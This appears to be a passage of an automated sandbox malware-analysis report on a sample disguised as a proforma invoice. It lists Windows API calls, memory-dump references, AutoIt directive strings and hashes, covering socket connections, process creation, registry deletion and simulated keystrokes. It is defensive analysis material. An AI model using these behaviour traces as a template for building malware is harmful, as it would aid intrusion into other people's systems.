  • Part of subcall function 002AA7E9: _strlen.LIBCMT ref: 002AA7F3
  • Part of subcall function 002AA7E9: _memmove.LIBCMT ref: 002AA815
• _strlen.LIBCMT ref: 002C6D44
• _memmove.LIBCMT ref: 002C6DAD
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• IsWindow.USER32(00C26378), ref: 002DB3EB
• IsWindowEnabled.USER32(00C26378), ref: 002DB3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002DB4DB
• SendMessageW.USER32(00C26378,000000B0,?,?), ref: 002DB512
• IsDlgButtonChecked.USER32(?,?), ref: 002DB54F
• GetWindowLongW.USER32(00C26378,000000EC), ref: 002DB571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002DB589
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
APIs
• _memset.LIBCMT ref: 002CF448
• _memset.LIBCMT ref: 002CF511
• ShellExecuteExW.SHELL32(?), ref: 002CF556
  • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
  • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
  • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
• GetProcessId.KERNEL32(00000000), ref: 002CF5CD
• CloseHandle.KERNEL32(00000000), ref: 002CF5FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
APIs
• GetParent.USER32(?), ref: 002B0F8C
• GetKeyboardState.USER32(?), ref: 002B0FA1
• SetKeyboardState.USER32(?), ref: 002B1002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 002B1030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 002B104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 002B1095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 002B10B8
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 002B0DA5
• GetKeyboardState.USER32(?), ref: 002B0DBA
• SetKeyboardState.USER32(?), ref: 002B0E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002B0E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002B0E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002B0EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002B0EC9
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945705084-0
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002AD5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002AD60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002AD61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002AD69D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,.$DllGetClassObject
• API String ID: 753597075-1173203973
APIs
  • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B3697,?), ref: 002B468B
  • Part of subcall function 002B466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B3697,?), ref: 002B46A4
• lstrcmpiW.KERNEL32(?,?), ref: 002B36B7
• _wcscmp.LIBCMT ref: 002B36D3
• MoveFileW.KERNEL32(?,?), ref: 002B36EB
• _wcscat.LIBCMT ref: 002B3733
• SHFileOperationW.SHELL32(?), ref: 002B379F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
APIs
• _memset.LIBCMT ref: 002D72AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D7351
• IsMenu.USER32(?), ref: 002D7369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D73B1
• DrawMenuBar.USER32 ref: 002D73C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002D0FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D0FFE
• FreeLibrary.KERNEL32(00000000), ref: 002D10B5
  • Part of subcall function 002D0FA5: RegCloseKey.ADVAPI32(?), ref: 002D101B
  • Part of subcall function 002D0FA5: FreeLibrary.KERNEL32(?), ref: 002D106D
  • Part of subcall function 002D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002D1090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 002D1058
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002D62EC
• GetWindowLongW.USER32(00C26378,000000F0), ref: 002D631F
• GetWindowLongW.USER32(00C26378,000000F0), ref: 002D6354
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002D6386
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002D63B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 002D63C1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002D63DB
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002ADB2E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002ADB54
• SysAllocString.OLEAUT32(00000000), ref: 002ADB57
• SysAllocString.OLEAUT32(?), ref: 002ADB75
• SysFreeString.OLEAUT32(?), ref: 002ADB7E
• StringFromGUID2.OLE32(?,?,00000028), ref: 002ADBA3
• SysAllocString.OLEAUT32(?), ref: 002ADBB1
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C7DB6
                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C61C6
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C61D5
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C620E
                                                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 002C6217
                                                                                                                    • WSAGetLastError.WSOCK32 ref: 002C6221
                                                                                                                    • closesocket.WSOCK32(00000000), ref: 002C624A
                                                                                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C6263
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: dee922297ca507b36f39786349620721357bf10e0cc8a804e2febe49e7f02281
• Instruction ID: a06c4b2ce212c400a42c72a14e993200083f385e1bff1c6c0c0302416e5e92d1
• Instruction Fuzzy Hash: 2C319031620108ABEF10AF64DC89FBA77A9EB45711F04412DFD06E7291CB70AD549AA6
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 79d8f8eec2691f36dbb09560c0f19b258c488c42b64340516545cb36e1139e0a
• Instruction ID: 52b869238bcb2308b8cccbbe63fb792d05e6876e6bf347ca04124425a5b36a80
• Instruction Fuzzy Hash: 10216772234512A7D230EA74AE02EA7B39CEF57700F508039F84686051EFA89DB5D794
APIs
  • Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
  • Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
  • Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D7632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D7659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D7665
Strings
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: ae3d52d6d765703253e8a2542a60f3390c9255478969025d5cdda75de7605e1d
• Instruction ID: e7ce0a4a7407673a8980d7f895ff02ff0bc9ad1d2c737dfd62d127650c14da7c
• Instruction Fuzzy Hash: 8011B2B2120219BFEF118F64CC85EE77F6DEF08798F014115BA04A21A0DB72DC21DBA4
APIs
• __init_pointers.LIBCMT ref: 00279AE6
  • Part of subcall function 00273187: EncodePointer.KERNEL32(00000000), ref: 0027318A
  • Part of subcall function 00273187: __initp_misc_winsig.LIBCMT ref: 002731A5
  • Part of subcall function 00273187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00279EA0
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00279EB4
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00279EC7
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00279EDA
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00279EED
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00279F00
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00279F13
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00279F26
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00279F39
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00279F4C
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00279F5F
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00279F72
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00279F85
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00279F98
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00279FAB
  • Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00279FBE
• __mtinitlocks.LIBCMT ref: 00279AEB
• __mtterm.LIBCMT ref: 00279AF4
  • Part of subcall function 00279B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00279AF9,00277CD0,0030A0B8,00000014), ref: 00279C56
  • Part of subcall function 00279B5C: _free.LIBCMT ref: 00279C5D
  • Part of subcall function 00279B5C: DeleteCriticalSection.KERNEL32(021,?,?,00279AF9,00277CD0,0030A0B8,00000014), ref: 00279C7F
• __calloc_crt.LIBCMT ref: 00279B19
• __initptd.LIBCMT ref: 00279B3B
• GetCurrentThreadId.KERNEL32 ref: 00279B42
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: 34f01b63fff39e5947112d06a84c2d6da3a0eecf14c08b91078bb2c7975e97d6
• Instruction ID: 83e55f63ed2581282c60d793a00a238e5173b3ea5ce22eeb1904cbf23f4f498f
• Instruction Fuzzy Hash: 61F0963263A72259E734BB747C07A4A27959F03734F20CA1AF45CC50D2FF3084E14960
APIs
• _memset.LIBCMT ref: 002DB644
• _memset.LIBCMT ref: 002DB653
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00316F20,00316F64), ref: 002DB682
• CloseHandle.KERNEL32 ref: 002DB694
Strings
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID: o1$do1
• API String ID: 3277943733-3825723036
• Opcode ID: c4d1899cfb2d5b3c9dda706a43acfa332b68c0dadb1a4df7dce26bdccb452187
• Instruction ID: 0b8b835bd7008bb5d3fc5e7d77133006a3da55345f137a9f7460e74f2ec0e285
• Instruction Fuzzy Hash: B0F054B1551300BBE21127A57C07FFB3B9DEB0C355F008061FA09D5191D7718C11CBA8
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00273F85), ref: 00274085
• GetProcAddress.KERNEL32(00000000), ref: 0027408C
• EncodePointer.KERNEL32(00000000), ref: 00274097
• DecodePointer.KERNEL32(00273F85), ref: 002740B2
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: e3344874005c3a356aa0881d59be4144ea0c08959088e8efae2ef65ba6152858
• Instruction ID: f37ce0fa30c3043491e8ac99045517f249599a56360126882cac204f398260e2
• Instruction Fuzzy Hash: 10E0BF70997341FFEB92BF61FD0DB453BA8B708742F108076F506E11A0CBB64A24CA18
APIs
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 76b414fce70ed4315a476acb9bc9480d4d23d6fdfacab3245a9398dc4472c5c6
• Instruction ID: 9bd75adb09277f705091d158992476ab53fef18e700478996e6ada80e7cdb2c0
• Instruction Fuzzy Hash: 3E619C3052065A9BCF11EF60CC85EFE37A9AF09348F044518FD595B192DB38E869CF54
APIs
  • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
  • Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D02BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D02FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002D0320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D0349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 002D038C
• RegCloseKey.ADVAPI32(00000000), ref: 002D0399
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4046560759-0
                                                                                                                    • Opcode ID: 8f23102f17b9781a34443fefaf0e96b8a206a6ea8b69081c2b7c03ed3671afa4
                                                                                                                    • Instruction ID: d032fb44d9db89ab7f88835608c51c02790dd62742c563632214a676fb90e54c
                                                                                                                    • Opcode Fuzzy Hash: 8f23102f17b9781a34443fefaf0e96b8a206a6ea8b69081c2b7c03ed3671afa4
                                                                                                                    • Instruction Fuzzy Hash: D4514831528201AFC714EF64D889E6ABBE8FF85314F04491EF945872A2DB31ED29CF56
APIs
• GetMenu.USER32(?), ref: 002D57FB
• GetMenuItemCount.USER32(00000000), ref: 002D5832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002D585A
• GetMenuItemID.USER32(?,?), ref: 002D58C9
• GetSubMenu.USER32(?,?), ref: 002D58D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 002D5928
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: 256af42be4f33772dc98f400799c789a24d43bdd89c8ae9270e5b242396ec066
• Instruction ID: 5c070304e1cd78b8bebbab25e676aa1e20a6fca63ebbdccd763b076d9932fd5a
• Opcode Fuzzy Hash: 256af42be4f33772dc98f400799c789a24d43bdd89c8ae9270e5b242396ec066
• Instruction Fuzzy Hash: 44516C31E11A25EFCF11DF64C845AAEB7B4EF48320F144066ED16AB351CBB0AE919F94
APIs
• VariantInit.OLEAUT32(?), ref: 002AEF06
• VariantClear.OLEAUT32(00000013), ref: 002AEF78
• VariantClear.OLEAUT32(00000000), ref: 002AEFD3
• _memmove.LIBCMT ref: 002AEFFD
• VariantClear.OLEAUT32(?), ref: 002AF04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002AF078
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: c7d60a062987156f16c79c4c6eb444e7222b7d971a04b2d5b160d8d4030fffd3
• Instruction ID: f293fbb4386ed74e1c986fa1fd68ea0015b0f930c38a15fcc906cb342ed794bf
• Opcode Fuzzy Hash: c7d60a062987156f16c79c4c6eb444e7222b7d971a04b2d5b160d8d4030fffd3
• Instruction Fuzzy Hash: A3517AB5A10209EFDB10CF58C884AAAB7B8FF4D314B15856AED49DB305E734E911CFA0
APIs
• _memset.LIBCMT ref: 002B2258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B22A3
• IsMenu.USER32(00000000), ref: 002B22C3
• CreatePopupMenu.USER32 ref: 002B22F7
• GetMenuItemCount.USER32(000000FF), ref: 002B2355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002B2386
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
• Instruction ID: 0d8e5b7b5f9bf6b768f9ab0addc2d7d6596bbd5ba0e8acfd9d0d21ecae57ec4f
• Opcode Fuzzy Hash: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
• Instruction Fuzzy Hash: 0B51C070A2130ADFDF21CF64D988BEDBBF5EF45394F1041A9E811A72A0D3749968CB51
APIs
  • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 0025179A
• GetWindowRect.USER32(?,?), ref: 002517FE
• ScreenToClient.USER32(?,?), ref: 0025181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0025182C
• EndPaint.USER32(?,?), ref: 00251876
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
• Opcode ID: 182190091855448c9f3fa8371ee539d8765af20d997b773ba7d5f069866893e2
• Instruction ID: 90be7d487e8ffe49da7ab78c36e1d8274d34cb75403d4e8d40835a4c613bcac9
• Opcode Fuzzy Hash: 182190091855448c9f3fa8371ee539d8765af20d997b773ba7d5f069866893e2
